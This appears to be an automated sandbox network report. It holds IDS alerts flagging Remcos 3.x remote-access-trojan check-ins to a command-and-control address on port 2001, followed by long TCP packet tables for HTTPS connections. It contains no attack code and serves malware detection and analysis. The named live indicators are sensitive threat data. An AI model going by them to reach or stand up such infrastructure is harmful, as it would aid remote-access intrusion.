2024-10-31T07:41:51.220517+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49759 | 181.236.112.169 | 2001 | TCP
2024-10-31T07:41:52.815631+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49760 | 181.236.112.169 | 2001 | TCP
2024-10-31T07:41:54.375581+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49761 | 181.236.112.169 | 2001 | TCP
                                                                                              2024-10-31T07:41:55.937978+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449762181.236.112.1692001TCP
                                                                                              2024-10-31T07:41:57.672426+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449764181.236.112.1692001TCP
                                                                                              2024-10-31T07:41:59.250597+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449766181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:00.815279+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449777181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:02.376348+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449783181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:03.938417+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449794181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:05.500475+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449805181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:07.079178+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449816181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:08.657245+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449824181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:10.238744+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449833181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:11.813179+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449844181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:13.377766+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449853181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:14.938356+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449861181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:16.438779+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449872181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:17.918640+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449881181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:19.344349+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449889181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:20.766372+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449899181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:22.244555+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449910181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:23.625678+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449917181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:24.962289+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449923181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:26.266463+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449934181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:27.570771+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449940181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:28.844251+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449951181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:30.076346+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449957181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:31.297618+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449965181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:32.485126+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449974181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:33.657910+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449980181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:34.813151+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449989181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:35.954553+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449997181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:37.063222+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450003181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:38.157818+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450009181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:39.219852+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450018181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:40.270568+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450026181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:41.314003+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450032181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:42.344399+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450038181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:43.385290+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450044181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:44.375625+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450051181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:45.359620+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450058181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:46.329576+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450064181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:47.287882+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450067181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:48.219436+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450068181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:49.141592+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450069181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:50.063925+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450070181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:50.970039+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450071181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:51.875778+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450072181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:52.780861+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450073181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:53.641839+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450074181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:54.518547+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450075181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:55.398388+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450076181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:56.235002+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450077181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:57.176751+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450078181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:58.020953+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450079181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:58.829009+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450080181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:59.783941+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450081181.236.112.1692001TCP
                                                                                              2024-10-31T07:43:00.580874+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450082181.236.112.1692001TCP
                                                                                              2024-10-31T07:43:01.380012+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450083181.236.112.1692001TCP
                                                                                              2024-10-31T07:43:02.178849+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450084181.236.112.1692001TCP
                                                                                              2024-10-31T07:43:02.970527+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450085181.236.112.1692001TCP
                                                                                              2024-10-31T07:43:03.737488+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450086181.236.112.1692001TCP
                                                                                              2024-10-31T07:43:04.500479+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450087181.236.112.1692001TCP
                                                                                              2024-10-31T07:43:05.470561+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450088181.236.112.1692001TCP
                                                                                              2024-10-31T07:43:06.222550+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450089181.236.112.1692001TCP
                                                                                              2024-10-31T07:43:06.974546+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450090181.236.112.1692001TCP
                                                                                              2024-10-31T07:43:07.703876+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450091181.236.112.1692001TCP
                                                                                              2024-10-31T07:43:08.442565+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450092181.236.112.1692001TCP
                                                                                              2024-10-31T07:43:09.861260+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450093181.236.112.1692001TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                              Oct 31, 2024 07:41:17.323715925 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:17.323738098 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:17.323777914 CET49733443192.168.2.4164.132.58.105
                                                                                              Oct 31, 2024 07:41:17.323785067 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:17.323820114 CET49733443192.168.2.4164.132.58.105
                                                                                              Oct 31, 2024 07:41:17.323879957 CET49733443192.168.2.4164.132.58.105
                                                                                              Oct 31, 2024 07:41:17.442451954 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:17.442475080 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:17.442553043 CET49733443192.168.2.4164.132.58.105
                                                                                              Oct 31, 2024 07:41:17.442553043 CET49733443192.168.2.4164.132.58.105
                                                                                              Oct 31, 2024 07:41:17.442559004 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:17.442643881 CET49733443192.168.2.4164.132.58.105
                                                                                              Oct 31, 2024 07:41:17.487001896 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:17.487020969 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:17.487163067 CET49733443192.168.2.4164.132.58.105
                                                                                              Oct 31, 2024 07:41:17.487169981 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:17.487337112 CET49733443192.168.2.4164.132.58.105
                                                                                              Oct 31, 2024 07:41:17.561517000 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:17.561536074 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:17.561660051 CET49733443192.168.2.4164.132.58.105
                                                                                              Oct 31, 2024 07:41:17.561666012 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:17.561741114 CET49733443192.168.2.4164.132.58.105
                                                                                              Oct 31, 2024 07:41:17.679754972 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:17.679773092 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:17.679984093 CET49733443192.168.2.4164.132.58.105
                                                                                              Oct 31, 2024 07:41:17.679991007 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:17.680037022 CET49733443192.168.2.4164.132.58.105
                                                                                              Oct 31, 2024 07:41:17.724087000 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:17.724102020 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:17.724167109 CET49733443192.168.2.4164.132.58.105
                                                                                              Oct 31, 2024 07:41:17.724174023 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:17.725171089 CET49733443192.168.2.4164.132.58.105
                                                                                              Oct 31, 2024 07:41:17.799549103 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:17.799571037 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:17.799751043 CET49733443192.168.2.4164.132.58.105
                                                                                              Oct 31, 2024 07:41:17.799757004 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:17.799798012 CET49733443192.168.2.4164.132.58.105
                                                                                              Oct 31, 2024 07:41:17.919424057 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:17.919440985 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:17.919507980 CET49733443192.168.2.4164.132.58.105
                                                                                              Oct 31, 2024 07:41:17.919518948 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:17.920187950 CET49733443192.168.2.4164.132.58.105
                                                                                              Oct 31, 2024 07:41:17.960861921 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:17.960880995 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:17.961039066 CET49733443192.168.2.4164.132.58.105
                                                                                              Oct 31, 2024 07:41:17.961045027 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:17.961085081 CET49733443192.168.2.4164.132.58.105
                                                                                              Oct 31, 2024 07:41:18.036309004 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:18.036328077 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:18.036365986 CET49733443192.168.2.4164.132.58.105
                                                                                              Oct 31, 2024 07:41:18.036371946 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:18.036393881 CET49733443192.168.2.4164.132.58.105
                                                                                              Oct 31, 2024 07:41:18.036415100 CET49733443192.168.2.4164.132.58.105
                                                                                              Oct 31, 2024 07:41:18.080121994 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:18.080137968 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:18.080207109 CET49733443192.168.2.4164.132.58.105
                                                                                              Oct 31, 2024 07:41:18.080213070 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:18.080252886 CET49733443192.168.2.4164.132.58.105
                                                                                              Oct 31, 2024 07:41:18.155319929 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:18.155334949 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:18.155392885 CET49733443192.168.2.4164.132.58.105
                                                                                              Oct 31, 2024 07:41:18.155400991 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:18.155425072 CET49733443192.168.2.4164.132.58.105
                                                                                              Oct 31, 2024 07:41:18.155432940 CET49733443192.168.2.4164.132.58.105
                                                                                              Oct 31, 2024 07:41:18.197630882 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:18.197685003 CET49733443192.168.2.4164.132.58.105
                                                                                              Oct 31, 2024 07:41:18.197690964 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:18.197700024 CET44349733164.132.58.105192.168.2.4
                                                                                              Oct 31, 2024 07:41:18.197741985 CET49733443192.168.2.4164.132.58.105
                                                                                              Oct 31, 2024 07:41:18.197973013 CET49733443192.168.2.4164.132.58.105
                                                                                              Oct 31, 2024 07:41:18.210391045 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:18.210449934 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:18.210534096 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:18.210756063 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:18.210792065 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:18.828986883 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:18.829086065 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:18.831888914 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:18.831928015 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:18.832149029 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:18.833220005 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:18.879374981 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.134493113 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.134557962 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.134587049 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.134639025 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.134638071 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:19.134668112 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.134680986 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.134798050 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:19.134798050 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:19.134850025 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.164321899 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.164397955 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:19.164427996 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.213047028 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:19.253137112 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.253185987 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.253211975 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.253242970 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:19.253267050 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.253328085 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:19.253546000 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.253590107 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.253612995 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.253645897 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:19.253662109 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.253715038 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:19.254317999 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.283299923 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.283328056 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.283344984 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.283503056 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:19.283521891 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.338071108 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:19.372190952 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.372231960 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.372260094 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.372284889 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.372298002 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:19.372318029 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.372348070 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:19.372364998 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.372419119 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:19.372436047 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.373243093 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.373270035 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.373316050 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:19.373330116 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.373379946 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:19.402278900 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.402327061 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.402353048 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.402374983 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:19.402393103 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.402442932 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:19.491166115 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.491288900 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.491333008 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.491365910 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.491373062 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:19.491409063 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.491440058 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:19.492258072 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.492319107 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:19.492333889 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.492403984 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:19.521172047 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.521219969 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.521270037 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:19.521286964 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.521328926 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:19.521358013 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:19.610155106 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.610203028 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.610240936 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.610270977 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:19.610295057 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.610321999 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:19.610342026 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:19.611121893 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.611183882 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:19.640397072 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.640470982 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:19.729042053 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.729127884 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:19.729203939 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.729265928 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:19.729306936 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.729361057 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:19.730283976 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.730335951 CET49736443192.168.2.4188.114.97.3
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 31, 2024 07:41:19.759280920 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:19.759365082 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:19.801668882 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:19.801737070 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:19.848073959 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:19.848144054 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:19.848371029 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:19.848406076 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:19.848428011 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:19.848453999 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:19.848483086 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:19.878000975 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:19.878057957 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:19.878077030 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:19.878132105 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:19.961726904 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:19.961795092 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:19.966972113 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:19.967029095 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:19.967197895 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:19.967248917 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:19.967746973 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:19.967773914 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:19.967803955 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:19.967827082 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:19.967859030 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:19.997087002 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:19.997138023 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:19.997153997 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:19.997205019 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:20.080780029 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:20.080876112 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:20.086004972 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:20.086060047 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:20.086121082 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:20.086170912 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
Oct 31, 2024 07:41:20.086348057 CET | 443 | 49736 | 188.114.97.3 | 192.168.2.4
Oct 31, 2024 07:41:20.086411953 CET | 49736 | 443 | 192.168.2.4 | 188.114.97.3
